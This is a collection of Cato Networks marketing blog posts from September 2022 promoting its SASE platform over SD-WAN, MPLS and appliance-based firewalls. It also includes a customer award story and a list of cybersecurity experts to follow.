The legacy security solutions that comprise traditional perimeter-focused security architectures are designed for networks that are rapidly becoming extinct. Often, these solutions adapt poorly to securing the modern, distributed corporate WAN.
Designing Security for the Modern Enterprise
As corporate networks become more distributed, security must follow suit. Effectively protecting the modern corporate WAN requires security solutions that can provide consistent protection and security policy enforcement throughout the corporate network.
Secure Access Service Edge (SASE) is designed for the distributed enterprise and addresses the common shortcomings of legacy security solutions. SASE is implemented using a network of cloud-based points of presence (PoPs) that can be deployed geographically near an organization’s scattered IT assets and can take advantage of cloud scalability to meet evolving business needs. SASE solutions also incorporate a full security stack — including solutions designed for cloud infrastructure and remote users — enabling traffic to be inspected by any PoP before being optimally routed to its destination.
Cato provides the world’s most robust single-vendor SASE platform, converging Cato SD-WAN and a cloud-native security service edge, Cato SSE 360, including ZTNA, SWG, CASB/DLP, and FWaaS into a global cloud service. With over 75 PoPs worldwide, Cato optimizes and secures application access for all users and locations, and is easily managed from a single pane of glass. To learn more about Cato SASE Cloud and how it can help your organization’s security architecture keep up with the evolution of your network infrastructure, sign up for a demo today.
September 22, 2022
Traditional Firewalls Can’t Keep Up with the Growth of Encrypted Traffic
A growing percentage of Internet traffic is protected by encryption. While estimates vary, most agree that at least 80% of Internet traffic uses SSL/TLS to ensure confidentiality, integrity, and authenticity of the data being transmitted. According to Google, approximately 95% of web browsing uses the encrypted HTTPS protocol.
This trend toward traffic encryption has been driven by a few different factors. As users become more educated about the differences between unencrypted HTTP and encrypted HTTPS and the threat of various attacks, they are opting for the more secure option wherever possible. Web browser vendors like Google are encouraging this trend by defaulting to the encrypted version of sites and labeling sites that only support HTTP as unsafe and reducing their SEO scores.
The move toward data encryption is a mixed blessing for cybersecurity. On one hand, the widespread use of SSL/TLS can help protect against phishing attacks or the exposure of user credentials and other sensitive data to someone eavesdropping on corporate network traffic. On the other hand, the same encryption that protects against eavesdroppers can also limit the effectiveness of an organization’s cybersecurity tools. Identification of malware and other malicious content within network traffic requires the ability to inspect the contents of packets traveling over the network. If this traffic is encrypted and network security solutions do not have the encryption key, then their threat prevention and detection capabilities are limited.
Network security solutions can overcome these challenges, but it comes at a cost. As the volume of network traffic increases and a growing percentage is encrypted, traditional network firewalls are falling behind, creating unnecessary tradeoffs between network performance and security.
Encrypted Traffic Inspection is a Bottleneck
Some organizations address the challenges that traffic encryption poses to security by performing TLS inspection. Security solutions that have access to the encryption keys used to protect network traffic can decrypt that traffic and inspect it for malicious content or data exfiltration before allowing it to continue on to its destination.
SSL inspection provides the ability to perform the deep packet inspection that security solutions need to do their jobs. However, decryption is a computationally expensive and time-consuming process. With growing volumes of encrypted traffic, decryption functionality within security solutions can create a significant bottleneck and degrade network performance. These issues are exacerbated by the fact that multiple solutions within an organization’s security architecture may need insight into the contents of network packets to fulfill their role. For example, firewalls, intrusion prevention systems (IPSs), secure web gateways (SWGs), and other security solutions may decide whether to allow or block traffic based on its contents.
Decrypting TLS traffic can exhaust these security tools’ compute capacity, creating a bottleneck. If an organization has deployed multiple solutions that independently perform TLS decryption and deep packet inspection, then the effects of decryption on network performance are cumulative.
TLS inspection is essential to identifying and blocking threats before they enter an organization’s network and to stopping data exfiltration before it becomes a breach. However, the costs of doing so can be high, creating a tradeoff between network performance and security.
SASE Enables Scalable Enterprise Security
TLS inspection is a vital capability for many security solutions because it enables deep packet inspection and detection of malicious content within network traffic. One of the primary barriers to implementing TLS inspection at scale is that security solutions’ resources are exhausted, which can create significant latency as each tool in an organization’s security architecture individually decrypts and inspects network traffic.
Secure Access Service Edge (SASE) provides the ability to perform TLS inspection while minimizing the impacts on network performance and latency. Three core capabilities that make this possible include:
#1. Solution Convergence: SASE solutions converge a full network security stack into a single solution. This makes it possible to decrypt traffic once and provide all security solutions with access to the decrypted data for inspection without jeopardizing security. By eliminating the individual traffic decryption by each device, SASE dramatically decreases the impact of TLS inspection on network performance.
#2. Cloud-Native Design: SASE points of presence (PoPs) are built with cloud-native software. By deploying security functionality in the cloud, SASE can take advantage of cloud scalability, eliminating the bottlenecks created by computationally expensive decryption operations.
#3. Cost Saving: By offloading all the TLS inspection work to an elastic cloud-native SASE service, enterprises don't need to worry about upgrading on-premises appliances prematurely. This saves the organization both the procurement and the integration costs of the new appliances.
TLS inspection is vital to companies’ ability to protect themselves against evolving cyber threats. As the volume of encrypted traffic grows, traditional firewalls can’t keep up, creating tradeoffs between network performance and security. SASE is vital to the future of enterprise security because it enables strong corporate network security without compromising performance.
Cato provides the world’s most robust single-vendor SASE platform, converging Cato SD-WAN and a cloud-native security service edge, Cato SSE 360, including ZTNA, SWG, CASB/DLP, and FWaaS into a global cloud service. With over 75 PoPs worldwide, Cato optimizes and secures application access for all users and locations, and is easily managed from a single pane of glass. Learn more about improving your network visibility, performance, and security with Cato SASE Cloud by signing up for a demo today.
September 20, 2022
The Return On Investment of SD-WAN
What is the ROI on SD-WAN projects? Most enterprises look at SD-WAN as an MPLS alternative, hoping to reduce their MPLS connectivity costs. But the actual SD-WAN ROI is a mix of hard and soft savings, from increased overall network capacity and availability to a reduced operational load of managing and securing the network. Let's look at the various areas of savings SD-WAN can offer and the resulting ROI.
SD-WAN ROI Driver #1: Reducing MPLS Connectivity Costs
Enterprises have long invested in managed MPLS services to connect locations. The bandwidth is expensive (relative to Internet capacity) and often limited or unavailable on some routes, forcing companies to either pay exorbitant fees to connect locations or, more likely, resort to Internet-based VPNs, complicating network design.
SD-WAN promises to break that paradigm, replacing MPLS entirely or partly with affordable last-mile Internet connectivity. The magnitude of SD-WAN savings is often related to how much MPLS can be replaced and the type of Internet-based connectivity.
Here there's a balance of considerations. Symmetrical Internet connections (also known as Dedicated Internet Access or DIA) offer guaranteed capacity, providing small savings relative to MPLS. Asymmetrical connections with best-effort capacity, such as xDSL or cable, can be aggregated together to match and exceed MPLS last mile uptime at a substantial discount compared to MPLS.
Often, the ROI argument for SD-WAN is less about hard cost savings and more about optimizing network spending. Enterprises receive far more capacity and functionality for the same amount spent on MPLS. The cost per bit drops dramatically, enabling IT to equip locations with 5x to 10x more capacity. With SD-WAN able to aggregate and fail over between multiple last-mile lines, uptime increases significantly.
One example was Fischer & Co, an automotive company that reduced its connectivity costs by 70% by replacing MPLS with Internet last-mile and Cato SASE Cloud while relying on Cato SSE 360 for network security protection. Along with the cost savings, Fischer & Co gained the agility to respond to new business challenges instantly, adding new security services or opening new locations, all without the operational overhead of upgrading and scaling of branch security appliances.
SD-WAN ROI Driver #2: Reducing the Costs of Branch Security
SD-WAN also allows organizations to avoid the branch security costs of legacy networks. With legacy architectures, enterprises backhaul branch Internet traffic to a regional datacenter for security inspection and policy enforcement. This approach consumes precious MPLS capacity, increasing costs while adding latency that undermines the user experience. With SD-WAN, companies avoid consuming expensive MPLS capacity on Internet traffic. Instead, MPLS only carries critical application traffic, offloading bandwidth-hungry and less critical applications to Internet connections.
However, this now requires branch security to inspect and enforce policies on the Internet flows. SD-WAN appliances include basic firewalls, but those firewalls lack the threat protection needed by today's enterprises. Branch firewalls offer more capabilities, but their capacity constraints limit inspection capabilities for CPU-intensive operations, such as SSL decryption, anti-malware, and IPS. As traffic grows or new capabilities are enabled, companies are often forced to upgrade their appliances. Cloud-based SSE solutions are more scalable but incur the operational cost of integrating and managing another point solution.
Network and network security convergence through a single-vendor SASE platform offers a way to tackle this tradeoff. Alewijnse, a Dutch manufacturing company, eliminated its MPLS network and applied enterprise-grade security to all traffic by switching to the Cato SASE Cloud, taking advantage of Cato’s full SSE 360 protection. "With Cato, we got the functionality of SD-WAN, a global backbone, and security service for our sites and mobile users, integrated together and at a fraction of the cost," said Willem-Jan Herckenrath, ICT Manager at Alewijnse.
UMHS, a healthcare company, eliminated its MPLS network and branch security firewalls by moving to Cato's converged, cloud-native and global SASE service. "UMHS is so satisfied with the decision to switch its firewalls to Cato that it plans to migrate all locations using MPLS as soon as their contracts expire. A cost analysis done by the organization shows that this change will save thousands of dollars by having all of its 13 locations connected to the Cato Cloud," said Leslie W. Cothren, IT director at UMHS.
SD-WAN ROI Driver #3: Network Automation and Co-managed Services
One of the costliest components of enterprise networking is the network management model. Legacy network management comes in two flavors: Do It Yourself (DIY) and a managed service. With DIY, network managers often use crude tools like Command Line Interfaces (CLIs) to manage router configurations. Since any network outage costs the business, networking teams focus on availability, evolving the network very slowly. Maintaining dynamic traffic routing or failover becomes very complex. To reduce this complexity, IT outsources network management to service providers, which increases costs and, depending on the provider, lengthens resolution times.
SD-WAN promises an improvement in network agility. DIY enterprises can automate network changes and increase network resiliency. However, SD-WAN does add "one more box to manage." For enterprises that prefer a managed service, a new co-managed model enables IT to make quick network changes through a self-service model while the service provider maintains the SD-WAN service. In a co-managed model, the customer doesn't have to maintain the underlying infrastructure and can focus instead on business-specific outcomes.
A case in point is Sun Rich, a food supplier with a North American network comprised of multiple MPLS providers, SD-WAN appliances, WAN optimization solutions, and network security devices – all managed by a small IT team. Every appliance came with its own management platform, complicating troubleshooting. By switching to the Cato SASE Cloud, Sun Rich reduced costs and gained control over network and security changes through Cato's single, converged management application. "Based on our size, our annual renewals on our appliances alone were nearly Cato's price," says Adam Laing, Systems Administrator at Sun Rich. "Simplification also translates into better uptime. You can troubleshoot faster with one provider than five providers," he says.
But Is SD-WAN Enough? Comparing SD-WAN to SASE
SD-WAN offers significant opportunities to reduce costs and gain more "bang for the buck" compared to MPLS, but SD-WAN alone will be insufficient to address the needs of today's workforce. As such, an SD-WAN ROI evaluation must consider the myriad of additional point solutions needed to meet enterprise networking and security requirements.
The most obvious example, perhaps, is the hybrid workforce. SD-WAN only connects locations. Remote users will require additional services. Security requirements demand protection against malware, ransomware, and other network-based threats not provided by the rudimentary firewalls included in SD-WAN devices, forcing the deployment of third-party security solutions. Cloud-connectivity solutions are also required. Additionally, SD-WAN performance over the long haul is undermined by the unpredictability of the Internet core, requiring the subscription and integration of yet another solution – a global private backbone.
Separately, these individual solutions may be manageable, but together they significantly complicate troubleshooting and deployment. Deployment takes longer as each point solution must be deployed. Problems take longer to resolve as operations teams must jump between management interfaces to solve issues. In short, organizational agility is reduced at a time when agility is often the very reason for adopting SD-WAN.
How Does SASE Solve SD-WAN's Limitations: Read the eBook
SASE solves these challenges while reducing overall spending compared to MPLS alternatives, like SD-WAN. Cato SASE Cloud overcomes SD-WAN's limitations with built-in SSE 360, zero trust, cloud-native architecture with a complete range of security protections, including Secure Web Gateway (SWG), Cloud Access Security Broker (CASB), Data Loss Prevention (DLP), Zero Trust Network Access (ZTNA), and Firewall as a Service (FWaaS) with Advanced Threat Prevention (IPS and Next Generation Anti-Malware). Those capabilities operate from Cato's global platform, making them available anywhere while providing locations and remote users with MPLS-like performance at a fraction of global MPLS costs. And with all components managed through a single interface, troubleshooting happens far faster than when juggling multiple interfaces. In short, SASE provides the promises of SD-WAN without its limitations, delivering considerable cost savings without compromising security, simplicity, or performance. For a more in-depth comparison of SASE vs SD-WAN, download our complimentary eBook, 5 Things That SASE covers that SD-WAN Does Not.
September 15, 2022
Network Firewalls Are Still Vital in the Era of the Cloud
Today, nearly all companies have some form of cloud infrastructure, and 89% are operating multi-cloud deployments. In general, this trend seems to be continuing with many companies planning to move additional assets to the cloud.
With the adoption of cloud infrastructure, organizations must reexamine their existing security infrastructures. Some security solutions are ill-suited to securing cloud environments, and the cloud introduces new security risks and challenges that must be managed as well. However, network firewalls are still a relevant and vital security solution in the era of the cloud.
Cloud Security Can Be Complex
Companies are moving to the cloud due to the various benefits that it provides. Cloud deployments increase the scalability and flexibility of IT infrastructure and are also better suited to supporting a distributed enterprise comprised of on-site and remote workers. Additionally, the cloud supports new methods of application development, such as a transition to serverless applications.
Another major selling point of the cloud is that customers can outsource responsibility for some of their infrastructure stacks to the service provider. Up to a certain layer, the service provider is wholly responsible for configuring, maintaining, and securing the leased infrastructure. However, this does not translate to a total handover of security responsibility. Under the cloud shared responsibility model, the cloud customer is responsible for managing and securing the portion of the infrastructure stack that they access and control.
Cloud deployments differ significantly from traditional, on-prem data centers. Many organizations struggle to effectively adapt their security models and architectures to support their new cloud environments, leading to widespread security misconfigurations and frequent cloud data breaches.
The interconnection between on-prem and cloud environments and between applications within cloud deployments makes network security vital to cloud security. Network firewalls are a crucial part of this, inspecting traffic flowing between different areas and limiting the risk of threats entering the corporate network or spreading within it.
What to Look for in a Network Firewall
Many organizations already have network firewalls in place; however, a network firewall designed to secure the perimeter of the corporate LAN is ill-suited to protecting a distributed enterprise WAN. As companies move to the cloud, there are a number of core capabilities a network firewall should include:
Companies are growing increasingly distributed. In addition to traditional on-prem data centers, organizations are moving data storage and applications to cloud-based infrastructure, often as part of multi-cloud deployments. At the same time, employees are moving outside of the traditional network perimeter with the growth of remote and hybrid work, and the use of mobile devices for business.
As a result, network firewalls need to be able to provide protection wherever a device is located. Backhauling traffic to the corporate network for security inspection doesn’t work because it hurts network performance and increases load on on-prem IT infrastructure. Network firewalls must be as distributed as the rest of an organization’s IT assets.
Companies are increasingly dependent on Software as a Service (SaaS) applications to provide critical functionality to both on-prem and remote employees. Often, these SaaS applications are latency-sensitive, and poor network performance has a significant impact on corporate productivity.
Network firewalls must offer strong performance to avoid creating tradeoffs between network performance and security. If network firewalls create latency due to inefficient routing or an inability to inspect traffic at line speed, they are more likely to be bypassed or otherwise undermined.
Corporate IT infrastructures are rapidly expanding as companies adopt cloud infrastructure, Internet of Things (IoT) devices, and mobile devices. As a result of this digital transformation, there are more devices, more applications, and more data flowing over corporate networks.
Network firewalls are responsible for inspecting and securing this network traffic, so they must scale with the network. As IT infrastructure takes advantage of the power of cloud scalability and IoT devices proliferate, network firewalls also need the scalability that the cloud provides.
Since corporate security architectures are growing increasingly complex, the variety of environments and endpoints that security analysts must secure can result in an array of standalone security solutions. This security sprawl is exacerbated by the evolution of the cyber threat landscape and the need to deploy defenses against new and emerging threats.
These complex and disconnected security architectures overwhelm security personnel and degrade a security team’s ability to rapidly identify and respond to threats. Standalone solutions require individual configuration and management, force context switching between dashboards when investigating an incident, and make security automation difficult or impossible.
A network firewall is the foundation of a corporate security architecture. To enforce consistent security policies and controls across all of an organization’s IT assets — including on-prem, cloud-based, and remote systems — companies need a network firewall that can operate effectively in all of these environments. Additionally, this firewall should be integrated with the rest of an organization’s security architecture to support rapid threat detection and response and enable security automation.
Simplifying Network Security with SASE
The transition to cloud-based infrastructure makes reconsidering and redesigning corporate security architecture critical. Cloud environments are more distributed and more exposed to potential threat actors than on-prem environments, and perimeter-based security models that worked in the past no longer apply when the perimeter is rapidly dissolving. While companies could attempt to build and integrate their own security architectures using various standalone solutions, a better approach is to adopt security designed for the modern corporate network.
Secure Access Service Edge (SASE) implements security with a network of cloud-based points of presence (PoPs) that meet all of the needs of the modern network firewall:
Location Agnostic: SASE PoPs are deployed as virtual appliances in the cloud. This allows them to be deployed anywhere, making them geographically convenient to devices located on-prem, remote, or in the cloud.
Performance: Each SASE PoP converges a full security stack, so security inspection and policy enforcement can happen at once and anywhere. This eliminates the need to backhaul traffic for scanning.
Scalability: SASE PoPs host cloud-native software that can leverage the scalability benefits of cloud infrastructure. A SASE Cloud can elastically scale vertically with more compute and throughput in a certain PoP, and horizontally with more PoPs in new geographical locations.
Solution Convergence: SASE PoPs converge a range of network and security functions, including a next-generation firewall, intrusion prevention system (IPS), zero-trust network access (ZTNA), SD-WAN, and more. A solution built to converge these functions into a single platform can optimize and streamline their interactions to a degree that is impossible with standalone solutions.
Cato provides the world’s most robust single-vendor SASE platform, converging Cato SD-WAN and a cloud-native security service edge, Cato SSE 360, including ZTNA, SWG, CASB/DLP, and FWaaS into a global cloud service. With over 75 PoPs worldwide, Cato optimizes and secures application access for all users and locations, and is easily managed from a single pane of glass. Learn more about how Cato SASE Cloud can improve your organization’s cloud security by signing up for a demo today.
September 8, 2022
Why Traditional NGFWs Fail to Meet Today’s Business Needs
The modern business looks very different from that of even a few years ago. IT technologies have changed rapidly, and corporate networks are quickly becoming more distributed and complex. While this brings business benefits, it also creates significant challenges.
One of the biggest hurdles that companies face is ensuring that the evolution of their IT infrastructure does not outpace that of their security infrastructure. Many companies have spent significant time and resources designing and implementing security architectures around traditional next-generation firewalls (NGFWs) and other security solutions. Attempting to make evolving IT infrastructure work with these existing security deployments is a losing battle, as these solutions were designed for networks that are rapidly becoming a thing of the past.
The Modern Enterprise is Expanding
In recent years, enterprise IT infrastructures have evolved, driven by the pandemic, shifting business needs, and the introduction of new IT and security technologies. Some of the most significant recent changes in corporate IT infrastructure include:
Nearly all companies have cloud-based infrastructure, and 89% have a multi-cloud deployment. This expansion into the cloud moves critical data and applications off-site and contributes to an increasingly distributed enterprise. Corporate WANs must be capable of efficiently and securely routing traffic between an organization’s various network segments.
The pandemic accelerated a transition to remote and hybrid work policies. With employees able to work from anywhere, corporate IT infrastructure must adapt to support them. Between remote work and the cloud, a growing percentage of corporate network traffic has no reason to pass through the headquarters network and its perimeter-based security solutions.
In addition to the growth in remote work, companies may also be expanding to new branch locations. Like remote workers, the employees at these sites need high-performance connectivity to corporate resources hosted both in on-prem data centers and in the cloud.
Mobile Device Usage
With the growth of remote work has also come greater usage of mobile devices — both corporate and personally owned — for business purposes. Devices that may not be owned or controlled by the company may have access to sensitive corporate data or IT resources, making access management and traffic inspection critical for corporate security.
Internet of Things (IoT) Devices
IoT devices have the potential to increase an organization’s operational efficiency and ability to make data-driven decisions. However, these devices also have notoriously poor security, posing a significant threat to the security of corporate networks where they are deployed. Corporate IT architectures must be capable of limiting the risk posed by these devices, regardless of where they are deployed within the corporate WAN.
With the evolution of corporate networks, traditional LAN-focused security models are no longer effective. While protecting the corporate LAN is important, a growing percentage of an organization’s employees and devices are located outside of the traditional network perimeter. Defending cloud-based assets and remote workers with perimeter-based defenses is inefficient and hurts network performance and corporate productivity. As enterprise networks expand and grow more distributed, security architectures must be designed to protect the corporate WAN wherever it is.
Appliance-Based NGFWs Have Significant Limitations
Traditionally, most organizations have implemented perimeter-based defenses using appliance-based security solutions. If most or all of an organization’s IT infrastructure and employees are located on-site, then appliance-based security solutions can effectively meet the needs of the enterprise.
However, this description no longer fits most companies’ IT environments, making the traditional perimeter-focused and appliance-based security model a poor fit for organizations’ security needs. Some of the main limitations of appliance-based security solutions such as next-generation firewalls (NGFWs) include:
NGFWs are designed to secure a protected network by inspecting and filtering traffic entering and leaving that network. To do so, they need to be deployed in line with all secured traffic flowing through them. This limits their effectiveness at securing the distributed enterprise as they must either be deployed at protected networks — which is increasingly unscalable with the growth of cloud deployments, remote work, and branch locations — or have all traffic rerouted to flow through them, which increases latency and harms network performance.
An appliance-based NGFW is limited by its hardware and has a maximum volume and rate of traffic that it can inspect and secure. As companies increasingly adopt cloud-based infrastructure, this creates challenges as cloud resources can rapidly scale to meet increased demand. Scaling an appliance-based security solution may require acquiring and deploying additional hardware, an expensive and time-consuming process that limits corporate agility.
Complex Management and Maintenance
To be effective, security solutions such as NGFWs must be tuned to address the security concerns of their deployment environments. As companies expand to include cloud-based infrastructure, remote work, and branch locations, they may need to protect a wide range of environments. The resulting array of security solutions and custom configurations makes security management complex and unscalable.
Traditional NGFWs were designed for corporate IT environments where an organization’s assets could be protected behind a defined perimeter and used infrastructure under the organization’s control. As corporate networks evolve and these assumptions become invalid, traditional NGFWs and similar perimeter-focused and appliance-based security solutions no longer meet the needs of the modern enterprise.
Redesigning the NGFW for the Modern Business
Businesses’ digital transformation initiatives and efforts to remain competitive in a changing marketplace have driven them to adopt new technologies. Increasingly, corporate assets are hosted in the cloud, and IT architectures are distributed.
Attempting to use traditional security solutions to secure the modern enterprise forces companies to make tradeoffs between network performance and security. As IT architecture moves to the cloud and becomes distributed, NGFWs and other corporate cybersecurity solutions should follow suit.
The evolution of the corporate network has driven the development of Secure Access Service Edge (SASE) solutions, which overcome the traditional limitations of NGFWs and integrate other key network and security functions. These cloud-based solutions provide various benefits to the organization, including:
Global Reach: SASE cloud-native software is deployed in points of presence (PoPs) all over the world. This enables delivery of NGFW capabilities anywhere, minimizing the distance between on-prem, cloud-based, and remote devices and the nearest PoP.
Improved Visibility: With SASE, all traffic traveling over the corporate WAN passes through at least one SASE PoP. This enables security inspection and policy enforcement and provides comprehensive visibility into corporate network traffic.
Simplified Management: All SASE features are managed through a single pane of glass. This simplifies security monitoring and management, and enables unified and consistent enforcement.
Security Integration: SASE PoPs consolidate numerous security and network capabilities into one coherent service, enabling greater optimization than standalone solutions.
Scalable Security: SASE PoPs run cloud-native software. Scaling up to meet increasing demand happens elastically, without downtime, and without customer involvement. Enterprises no longer need to worry about mid-term hardware failure or refresh.
Performance Optimization: Delivering security next to the user and the application instead of carrying user and application traffic into a central security stack reduces network latency, and improves user experience and productivity.
Cato Networks built the world’s first cloud-native, single-vendor SASE. The Cato SASE Cloud is available from a private cloud of 75+ PoPs connected by a dedicated, SLA-backed private global backbone. See the capabilities of Cato SASE Cloud for yourself by signing up for a free demo today.
September 6, 2022
The Gnutti Carlo Group Names Cato Networks 2021 Best Supplier in the Innovation Category
Cato has received much praise and many industry awards from analysts over the years, but it's our customers who know us the best. So, it's especially gratifying to receive an award from a customer -- the 2021 Best Supplier award in the Innovation Category from global manufacturer Gnutti Carlo Group. The award recognizes the high value of the WAN connectivity and security the Cato SASE Cloud delivers in support of the Gnutti Carlo Group's digital transformation initiative.
"Thanks to the Cato platform and together with strategic services, the Gnutti Carlo Group has benefitted from a more structured, controlled, and secure ICT landscape across the entire company," says Omar Moser, Group Chief Information Officer for the Gnutti Carlo Group. (You can read more about the award here and the Gnutti Carlo Group's story here.)
Too Much Complexity!
Based in Brescia, Italy, the Gnutti Carlo Group is a leading global auto component manufacturer and partner to several OEMs active in the auto, truck, earthmoving, motorcycle, marine, generator sets, and e-mobility sectors. With annual revenues of 700 million euros and nearly 4,000 employees, the company has 16 plants in nine countries in Europe, America, and Asia.
The Group came to Cato to rein in the complexity of its network and security infrastructure built over the years from numerous mergers and acquisitions. "Since 2000, we have started with an intensive program of internationalization, performing various acquisitions of companies of our sector and even competitors, each with different network and security architectures and policy engines," says Moser. "It was difficult to keep policies aligned and prevent back doors and other threats."
The company had several datacenters across its locations for local services and took advantage of Microsoft Office 365, Microsoft Azure, and hosted SAP cloud services. "We had it all: public cloud, private cloud, and on-premises applications," says Moser.
Most locations were connected with IPsec VPNs, except for China, which was reached from Frankfort via a shared MPLS.
Moser realized that the only way to serve the business effectively was to centralize security and interconnection control among all locations and between plants, suppliers, and the cloud.
Cato Does it All
He looked at several SD-WAN and SASE solutions, but Cato SASE was the only one that could deliver on all his requirements. "The other solutions couldn't give us a single package with integrated security, networking, and remote access," says Moser. He liked other things about the Cato solution, including its large number of globally dispersed points of presence, SASE architecture, single network and security dashboard, and forward-looking roadmap. Less tangible pluses were his great relationship with Cato and its excellent response time whenever he had any questions.
Moser entered into a three-month conditional purchase contract with Cato, after which he could close the contract if it didn't meet expectations. He connected ten plants, two service providers, 650 remote access VPN users, and Microsoft Azure via Cato and deployed Cato's SSE 360 security services across them.
A Platform for Digital Transformation
The results were so positive that he nominated Cato for the Best Supplier award. Network performance was excellent, even in China, where Moser saw a noticeable latency improvement over MPLS. Security was much improved thanks to firewall policy centralization and optimization and the ability to monitor traffic and block risky services that were previously open. "Standardizing firewall policies and knowing I can prevent intrusions and malware has allowed me to sleep a lot better," says Moser.
Best of all, Cato has enhanced the group's business agility for its digital transformation. "It is my job to be proactive and efficient," says Moser. "If we need to open a new office we can do it easily. With Cato, we have standardization, an innovative approach, and a single partner we can grow with as we transform digitally."
Satisfying and empowering our customers are Cato's ultimate goals, which is why awards like this one from the Gnutti Carlo Group are music to our ears.
September 1, 2022
15 Cybersecurity Experts To Follow on LinkedIn
Our list of experts encompasses professionals and leaders who, together, deliver an overarching understanding of the Cybersecurity industry and the evolving nature of security threats. By following them, you can gain deep insights into cybersecurity’s latest developments and trends, deepen your understanding of the hacker mindset and get a glimpse into future predictions. As global cybersecurity leaders who’ve seen the dark side, they have interesting and unique perspectives that can provide value to anyone working or interested in cybersecurity. Read on to see who the top 15 cybersecurity experts are that we recommend following on LinkedIn.
1. Brian Krebs
Brian is an investigative reporter and journalist who focuses his work on cybercrime and cybersecurity. He is the author of a daily blog that is hosted on his website KrebsOnSecurity.com. For 14 years (2005 to 2019), Brian reported for The Washington Post. He also authored more than 1000 blog posts for the Security Fix blog.
The KrebsOnSecurity blog covers a wide variety of topics, from data breaches to security updates to human stories of cyber scams. They are all reported in an informative, yet personalized, manner; almost as if you were listening to a friend tell you a story. The busy comment section adds an inviting and interactive feeling.
2. Andy Greenberg
Andy Greenberg is a cybersecurity writer for the online media outlet, WIRED, and an author. Andy’s stories cover cybersecurity, privacy, hackers and information freedom. Some of his recent articles cover the war in Ukraine, how data and organizations are hacked to seize political control and recent cyber attacks. Andy has written two books. The first, Sandworm: A New Era of Cyberwar and the Hunt for the Kremlin's Most Dangerous Hackers, was published in 2019. The second, Tracers in the Dark: The Global Hunt for the Crime Lords of Cryptocurrency, will be released in November 2022.
3. Mikko Hypponen
The well-known security saying “if it’s smart, it’s vulnerable” was coined by this security expert and influencer, Mikko Hypponen. Mikko is the Chief Research Officer at WithSecure and the Principal Research Advisor at F-Secure, as well as a researcher, keynote speaker, columnist and author. Mikko’s work covers global security trends and vulnerabilities, privacy and data breaches. Follow him to uncover data-driven analyses of what’s going on in privacy and security, accompanied by his take on what the future of cybersecurity holds.
4. Graham Cluley
Graham is a researcher, blogger, public speaker and podcaster. He talks about computer security threats and works with law enforcement agencies on hacker and cyber gang investigations. Graham’s daily blog, grahamcluley.com, focuses mainly on cyber attacks and scams. Reports are bite-sized and include concise explanations coupled with tips for readers. Graham also hosts the Smashing Security podcast, together with Carole Theriault.
5. Daniel Miessler
Head of Vulnerability Management and AppSec at Robinhood by day, security writer by night, Daniel creates and delivers security-related content on a regular basis via his website, danielmiessler.com. There, you can find blogs, tutorials and podcasts on information security, often combined with his philosophical and political views. The result is a wealth of candid information, depicting a refreshing and humanistic view of information security.
6. Ido Cohen (Darkfeed)
If you’re looking to stay up-to-date on all things ransomware, Ido’s Twitter page is one to follow. Through quick and concise updates, Ido provides all the necessary information about recent attacks, ransomware gangs, ransomware strains and threats. While you might not get in-depth analyses or intense research reports from Ido, you will stay in the know about news, so you can pick and choose what to dig deeper into on your own time.
7. Etay Maor
An industry-recognized cybersecurity speaker and a Business Insider “IBM Rockstar Employee”, we’re proud to call Etay one of our own, as Senior Director of Security Strategy at Cato Networks. Etay is an adjunct professor at Boston College, and is part of the Call for Paper (CFP) committees for the RSA Conference and QuBits Conference. In addition to following him on LinkedIn, Etay has a dedicated Cybersecurity Masterclass series, designed to teach professionals of all levels the best practices they need to protect their enterprise. Watch his Masterclass series on everything from identifying and mitigating deepfake threats, setting up threat hunting and threat intelligence programs, and more.
8. Kevin Mitnick
Convicted-hacker turned security consultant, Kevin is a valuable source of cybersecurity information, especially when it comes to social engineering and system penetration. Kevin now runs a security firm, speaks in the media at cybersecurity events and has authored a number of popular books. Follow him and his blog to (start to) understand the mindset of hackers.
9. Chuck Brooks
Chuck is a thought leader, speaker and writer for cybersecurity who boasts multiple accolades, like “Top Person To Follow on Tech by LinkedIn” and “received Presidential Appointments for Executive Service by two US Presidents”. By following him on LinkedIn you will be exposed to his articles and speaking occasions, as well as his commentary on current affairs.
10. Dan Lohrmann
Dan is a renowned cybersecurity speaker, author and blogger, as well as an advisor for government organizations. His blog covers technological trends and global changes from a bird's eye view, while his social channel provides a newsfeed which outlines recent attacks and events from a governmental and geo-political security perspective. Together, they provide a broad overview of cybersecurity needs for the public sector.
11. Magda Chelly
Dr. Magda Lilia Chelly is a cybersecurity leader, influencer and author who appears regularly in the media. She has authored three books and regularly leverages her public stance to promote social issues, like gender equality in the workplace or WLB. By following her, you’ll devour a broad range of cybersecurity topics, from remote work requirements to risk management to cybersecurity trends. Most of her thoughts and content are strategic, and can help any leader looking to design or improve their organizational security.
12. Rinki Sethi
Rinki is the CISO at bills.com and was formerly the CISO at Twitter and the Information Security VP at IBM and Palo Alto Networks. As a security leader, she not only builds and manages cybersecurity strategies, but she also shares her thoughts and knowledge. By following her social channels, you will get access to her curated list of cybersecurity resources as well as a peek into the professional and personal life of a CISO.
13. Tyler Cohen Wood
A recognized top cybersecurity influencer, Tyler is a co-founder of a cybersecurity product and a Talk Show host at My Connected Life, which discusses digital health. She is also an author, a writer and a public speaker. Tyler’s work focuses mainly on how to mitigate cyber threats in a digital world, from a unique perspective that combines both personal opinion and business requirements.
14. Bill Brenner
Bill is an infosec expert who researches, writes and builds communities. He’s also a VP at CyberRisk Alliance. On his social channels he shares the latest updates about vulnerabilities and security controls. What’s unique about him is that he has a down-to-earth approach to cybersecurity, by understanding that security’s job is not to scare, but to provide practical and feasible assistance to CISOs.
15. Richard Bejtlich
As a security strategist, former computer incident response team lead and martial arts student, Richard definitely knows about defense. In the past, he published a number of books as well as a blog. Today, we recommend following him on Twitter, where he shares his personal (and sometimes tongue-in-cheek) commentary on security-related current affairs.
Who Else Should We Follow?
Working in cybersecurity often feels like playing a never-ending game of Whack-A-Mole. Cybersecurity experts, like those listed above, can help security experts shorten the path to determining what they should focus on strategically, which issues they should pay attention to and how to allocate their resources. Are there any other experts who help you prioritize what to work on? Share with us on LinkedIn.
IT Supply Chain Problems? Here’s How the Cloud Helps Get Around Them
During an investor call in February 2022, Arista Networks’ president and CEO Jayshree Ullal said that some of the lead times on its sales are 50-70 weeks out. Likewise, Cisco is facing extreme product delays. According to Cisco CFO Scott Herren, “The ongoing supply constraints not only impacted our ability to ship hardware, but also impacts our delivery of software such as subscriptions that customers order with the hardware. That undelivered software is also included in backlog until the hardware ships, which is when we begin to recognize the revenue.”
